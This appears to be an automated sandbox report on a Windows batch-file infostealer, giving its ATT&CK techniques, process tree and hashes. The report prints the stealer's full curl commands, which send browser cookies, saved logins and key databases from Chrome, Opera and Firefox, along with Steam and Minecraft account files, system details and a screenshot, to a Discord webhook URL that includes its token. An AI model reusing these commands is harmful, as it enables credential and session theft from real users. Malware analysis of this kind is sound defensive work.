ffb7484dbd43f1a8de746604b64da32f8f408b8c76429cb8d36c0fe6c31d6438

Analysis

max time kernel
130s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
18-02-2024 02:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

dependencies/2024-1-12/auth..bat
Size

6KB
MD5

8825cf897e698ebbdb8c707bb39d73ca
SHA1

dcece549ce6ed0b24ecc1faf80280c225bdcccae
SHA256

b332d0f81de5a8eced6109033f05192e2aa5ca3ed0a523367428813924a9a28d
SHA512

e3c63dda17128929108ff5492364b4d2df8126f2a8c17d7384ba9f7b0651aec72c11681dd7196f2eef7d693b9b3165b96fc05c98afc40fab9252ef2c7a26e3f9
SSDEEP

192:sYHAivgiRwe5f11ATNLCAtMT7/4+tGs1PP/uQz8tz1hNn:8i4iRwe5f11ATNLCAtMT7/4+tGs1PP/M

Score

8^/10

evasion spyware stealer

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

6 4132 powershell.exe
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

800 attrib.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

flow	pid	process
6	4132	powershell.exe

pid	process
800	attrib.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 39 IoCs

Web Service

T1102

Processes:

flow	ioc
61	discord.com
84	discord.com
87	discord.com
99	discord.com
9	discord.com
73	discord.com
74	discord.com
98	discord.com
105	discord.com
29	discord.com
63	discord.com
68	discord.com
69	discord.com
70	discord.com
79	discord.com
94	discord.com
60	discord.com
65	discord.com
72	discord.com
75	discord.com
80	discord.com
96	discord.com
103	discord.com
54	discord.com
67	discord.com
76	discord.com
88	discord.com
64	discord.com
71	discord.com
78	discord.com
97	discord.com
102	discord.com
66	discord.com
77	discord.com
81	discord.com
8	discord.com
55	discord.com
82	discord.com
14	discord.com

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

5 api.ipify.org

flow	ioc
5	api.ipify.org

Delays execution with timeout.exe 10 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	process
3948	timeout.exe
3812	timeout.exe
112	timeout.exe
1404	timeout.exe
2548	timeout.exe
4876	timeout.exe
4808	timeout.exe
3340	timeout.exe
800	timeout.exe
3044	timeout.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

5052 tasklist.exe
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

ipconfig.exe

pid process

3424 ipconfig.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

4360 systeminfo.exe
Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\Local Settings powershell.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

180 reg.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

3016 PING.EXE
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

3316 powershell.exe
3316 powershell.exe
4132 powershell.exe
4132 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exetasklist.exe

description pid process

Token: SeDebugPrivilege 3316 powershell.exe
Token: SeDebugPrivilege 4132 powershell.exe
Token: SeDebugPrivilege 5052 tasklist.exe

pid	process
5052	tasklist.exe

pid	process
3424	ipconfig.exe

pid	process
4360	systeminfo.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\Local Settings	powershell.exe

pid	process
180	reg.exe

pid	process
3016	PING.EXE

pid	process
3316	powershell.exe
3316	powershell.exe
4132	powershell.exe
4132	powershell.exe

description	pid	process
Token: SeDebugPrivilege	3316	powershell.exe
Token: SeDebugPrivilege	4132	powershell.exe
Token: SeDebugPrivilege	5052	tasklist.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exepowershell.execmd.execmd.execmd.exenet.exe

description	pid	process	target process
PID 264 wrote to memory of 3316	264	cmd.exe	powershell.exe
PID 264 wrote to memory of 3316	264	cmd.exe	powershell.exe
PID 3316 wrote to memory of 3104	3316	powershell.exe	cmd.exe
PID 3316 wrote to memory of 3104	3316	powershell.exe	cmd.exe
PID 3104 wrote to memory of 1020	3104	cmd.exe	cmd.exe
PID 3104 wrote to memory of 1020	3104	cmd.exe	cmd.exe
PID 1020 wrote to memory of 3016	1020	cmd.exe	PING.EXE
PID 1020 wrote to memory of 3016	1020	cmd.exe	PING.EXE
PID 1020 wrote to memory of 1740	1020	cmd.exe	findstr.exe
PID 1020 wrote to memory of 1740	1020	cmd.exe	findstr.exe
PID 3104 wrote to memory of 3312	3104	cmd.exe	cmd.exe
PID 3104 wrote to memory of 3312	3104	cmd.exe	cmd.exe
PID 3312 wrote to memory of 4132	3312	cmd.exe	powershell.exe
PID 3312 wrote to memory of 4132	3312	cmd.exe	powershell.exe
PID 3104 wrote to memory of 1348	3104	cmd.exe	curl.exe
PID 3104 wrote to memory of 1348	3104	cmd.exe	curl.exe
PID 3104 wrote to memory of 4540	3104	cmd.exe	curl.exe
PID 3104 wrote to memory of 4540	3104	cmd.exe	curl.exe
PID 3104 wrote to memory of 1468	3104	cmd.exe	curl.exe
PID 3104 wrote to memory of 1468	3104	cmd.exe	curl.exe
PID 3104 wrote to memory of 800	3104	cmd.exe	attrib.exe
PID 3104 wrote to memory of 800	3104	cmd.exe	attrib.exe
PID 3104 wrote to memory of 1540	3104	cmd.exe	curl.exe
PID 3104 wrote to memory of 1540	3104	cmd.exe	curl.exe
PID 3104 wrote to memory of 4360	3104	cmd.exe	systeminfo.exe
PID 3104 wrote to memory of 4360	3104	cmd.exe	systeminfo.exe
PID 3104 wrote to memory of 1200	3104	cmd.exe	curl.exe
PID 3104 wrote to memory of 1200	3104	cmd.exe	curl.exe
PID 3104 wrote to memory of 5052	3104	cmd.exe	tasklist.exe
PID 3104 wrote to memory of 5052	3104	cmd.exe	tasklist.exe
PID 3104 wrote to memory of 2308	3104	cmd.exe	curl.exe
PID 3104 wrote to memory of 2308	3104	cmd.exe	curl.exe
PID 3104 wrote to memory of 3544	3104	cmd.exe	net.exe
PID 3104 wrote to memory of 3544	3104	cmd.exe	net.exe
PID 3544 wrote to memory of 3580	3544	net.exe	net1.exe
PID 3544 wrote to memory of 3580	3544	net.exe	net1.exe
PID 3104 wrote to memory of 2788	3104	cmd.exe	curl.exe
PID 3104 wrote to memory of 2788	3104	cmd.exe	curl.exe
PID 3104 wrote to memory of 180	3104	cmd.exe	reg.exe
PID 3104 wrote to memory of 180	3104	cmd.exe	reg.exe
PID 3104 wrote to memory of 1116	3104	cmd.exe	curl.exe
PID 3104 wrote to memory of 1116	3104	cmd.exe	curl.exe
PID 3104 wrote to memory of 3424	3104	cmd.exe	ipconfig.exe
PID 3104 wrote to memory of 3424	3104	cmd.exe	ipconfig.exe
PID 3104 wrote to memory of 4964	3104	cmd.exe	curl.exe
PID 3104 wrote to memory of 4964	3104	cmd.exe	curl.exe
PID 3104 wrote to memory of 956	3104	cmd.exe	curl.exe
PID 3104 wrote to memory of 956	3104	cmd.exe	curl.exe
PID 3104 wrote to memory of 3848	3104	cmd.exe	curl.exe
PID 3104 wrote to memory of 3848	3104	cmd.exe	curl.exe
PID 3104 wrote to memory of 3480	3104	cmd.exe	curl.exe
PID 3104 wrote to memory of 3480	3104	cmd.exe	curl.exe
PID 3104 wrote to memory of 3948	3104	cmd.exe	timeout.exe
PID 3104 wrote to memory of 3948	3104	cmd.exe	timeout.exe
PID 3104 wrote to memory of 3300	3104	cmd.exe	curl.exe
PID 3104 wrote to memory of 3300	3104	cmd.exe	curl.exe
PID 3104 wrote to memory of 772	3104	cmd.exe	curl.exe
PID 3104 wrote to memory of 772	3104	cmd.exe	curl.exe
PID 3104 wrote to memory of 2320	3104	cmd.exe	curl.exe
PID 3104 wrote to memory of 2320	3104	cmd.exe	curl.exe
PID 3104 wrote to memory of 4808	3104	cmd.exe	timeout.exe
PID 3104 wrote to memory of 4808	3104	cmd.exe	timeout.exe
PID 3104 wrote to memory of 3272	3104	cmd.exe	curl.exe
PID 3104 wrote to memory of 3272	3104	cmd.exe	curl.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

800 attrib.exe

pid	process
800	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\dependencies\2024-1-12\auth..bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:264

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell start -verb runas 'C:\Users\Admin\AppData\Local\Temp\dependencies\2024-1-12\auth..bat' am_admin
2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3316

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dependencies\2024-1-12\auth..bat" am_admin
3⤵
- Suspicious use of WriteProcessMemory
PID:3104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c 2>NUL ping -4 -n 1 NUPNSVML | findstr [
4⤵
- Suspicious use of WriteProcessMemory
PID:1020

C:\Windows\system32\PING.EXE
ping -4 -n 1 NUPNSVML
5⤵
- Runs ping.exe
PID:3016

C:\Windows\system32\findstr.exe
findstr [
5⤵
PID:1740

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell Invoke-RestMethod api.ipify.org
4⤵
- Suspicious use of WriteProcessMemory
PID:3312

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-RestMethod api.ipify.org
5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4132

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```[Report from Admin - 89.149.23.59]\nLocal time: 2:07```\"}" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:1348

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```Screenshot @ 2:07```\"}" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:4540

C:\Windows\system32\curl.exe
curl --silent -L --fail "https://github.com/chuntaro/screenshot-cmd/blob/master/screenshot.exe?raw=true" -o s.exe
4⤵
PID:1468

C:\Windows\system32\attrib.exe
attrib "C:\ProgramData\s.exe" +h
4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:800

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F ss=@"C:\ProgramData\s.png" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:1540

C:\Windows\system32\systeminfo.exe
SystemInfo
4⤵
- Gathers system information
PID:4360

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F systeminfo=@"C:\Users\Admin\AppData\Roaming\sysinfo.txt" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:1200

C:\Windows\system32\tasklist.exe
tasklist
4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5052

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Roaming\tasklist.txt" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:2308

C:\Windows\system32\net.exe
net user
4⤵
- Suspicious use of WriteProcessMemory
PID:3544

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user
5⤵
PID:3580

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Roaming\netuser.txt" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:2788

C:\Windows\system32\reg.exe
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
4⤵
- Modifies registry key
PID:180

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Roaming\stup.txt" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:1116

C:\Windows\system32\ipconfig.exe
ipconfig /all
4⤵
- Gathers network information
PID:3424

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Roaming\ipconfig.txt" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:4964

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- CHROME -```\"}" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:956

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F c=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:3848

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F h=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:3480

C:\Windows\system32\timeout.exe
timeout /t 2 /nobreak
4⤵
- Delays execution with timeout.exe
PID:3948

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F s=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Shortcuts" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:3300

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F b=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Bookmarks" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:772

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F l=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:2320

C:\Windows\system32\timeout.exe
timeout /t 2 /nobreak
4⤵
- Delays execution with timeout.exe
PID:4808

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F l=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:3272

C:\Windows\system32\timeout.exe
timeout /t 2 /nobreak
4⤵
- Delays execution with timeout.exe
PID:3812

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- OPERA -```\"}" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:836

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F c=@"C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Cookies" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:4292

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F h=@"C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\History" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:1860

C:\Windows\system32\timeout.exe
timeout /t 2 /nobreak
4⤵
- Delays execution with timeout.exe
PID:112

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F s=@"C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Shortcuts" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:4072

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F b=@"C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Bookmarks" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:2356

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F l=@"C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Login Data" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:4296

C:\Windows\system32\timeout.exe
timeout /t 2 /nobreak
4⤵
- Delays execution with timeout.exe
PID:1404

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- FIREFOX -```\"}" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:1680

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c 2>NUL dir /b "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles"
4⤵
PID:4104

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\urxy0c8h.Admin\logins.json" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:3492

C:\Windows\system32\timeout.exe
timeout /t 2 /nobreak
4⤵
- Delays execution with timeout.exe
PID:3340

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\urxy0c8h.Admin\key3.db" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:2168

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\urxy0c8h.Admin\key4.db" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:1988

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\urxy0c8h.Admin\cookies.sqlite" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:732

C:\Windows\system32\timeout.exe
timeout /t 2 /nobreak
4⤵
- Delays execution with timeout.exe
PID:800

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x3x6afp6.default-release\logins.json" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:2792

C:\Windows\system32\timeout.exe
timeout /t 2 /nobreak
4⤵
- Delays execution with timeout.exe
PID:3044

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x3x6afp6.default-release\key3.db" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:2120

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x3x6afp6.default-release\key4.db" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:2524

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x3x6afp6.default-release\cookies.sqlite" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:676

C:\Windows\system32\timeout.exe
timeout /t 2 /nobreak
4⤵
- Delays execution with timeout.exe
PID:2548

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- DISCORD -```\"}" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:3856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c 2>NUL dir /b "C:\Users\Admin\AppData\Roaming\discord\Local Storage\leveldb\"
4⤵
PID:2684

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- STEAM -```\"}" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:1408

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F steamusers=@"C:\Program Files (x86)\Steam\config\loginusers.vdf" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:3712

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F loginusers=@"C:\Program Files\Steam\config\loginusers.vdf" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:1196

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c 2>NUL dir /b "C:\Program Files (x86)\Steam\"
4⤵
PID:1812

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c 2>NUL dir /b "C:\Program Files\Steam\"
4⤵
PID:2976

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- MINECRAFT -```\"}" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:3084

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F steamusers=@"C:\Users\Admin\AppData\Roaming\.minecraft\launcher_profiles.json" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:3416

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F steamusers=@"C:\Users\Admin\AppData\Roaming\.minecraft\launcher_accounts.json" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:2520

C:\Windows\system32\timeout.exe
timeout /t 2 /nobreak
4⤵
- Delays execution with timeout.exe
PID:4876

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```Batch Scheduled: false\n[End of report]```\"}" https://discord.com/api/webhooks/1206395868828270662/ubyEctgohrXHxHNp0v54O7XN4Rbm_7UehFKncKLTcdQ9lhzVgPR6f4ELT3RCRDvnBW5P
4⤵
PID:3620

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\s.exe

Filesize
107KB

MD5
dde6616df2c6e7860cc8ef5fc40d13b4

SHA1
5314f1d0845f2053bfb6a3ba50865de3435321eb

SHA256
d380b896c302c0b83fd91c90260d6c1bbd87d56b5d9db8a992825bb0e4248ec4

SHA512
471594242ca646c15dc8859df09413addcafa26475fdcaa03ccc5e08a45d096843267674eaf2978dd55f6e7028cd7464025e3c8b15d49ebf9634e42edfedc3a4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
7ff9440dc25523a288d278b38add13a1

SHA1
d67faf5afe85cacd9d816349f17ded3686ecf1a7

SHA256
ac518124d3bd39440bfba66739f8fab57ff82ea778f707ea2c902b29efde0ee0

SHA512
7116fcf6760a69efebfbffeba5abcfef903cc8647e142117023e022bb34c5fe6d1a35c727faab1e6d6505b2bd69689cf52f8ecef5253ca12d99d425021799911

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tj2faqtm.hw3.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\ipconfig.txt

Filesize
1022B

MD5
4e451b3bd28b1b434bf89f7b24f05b6d

SHA1
b1acee942942bf69008a0088d022b969932c53ae

SHA256
c84630caac5c9e287b6ca3071510de34b602d6a137b36358fbb17c5db0a0160b

SHA512
b162f50964f2e3455713afc82b32fa29cc1c35bae218309c6cde1e595a4bed60b01f19ee9e822ba77bfecdfe2728019bb33dd106e97eabe6965fca64756008c6

Download Submit
C:\Users\Admin\AppData\Roaming\netuser.txt

Filesize
283B

MD5
3c36ae6e8086bc41adf7fd258215149a

SHA1
04a03d04dc7068fd8083c000a01424bc6c180fb6

SHA256
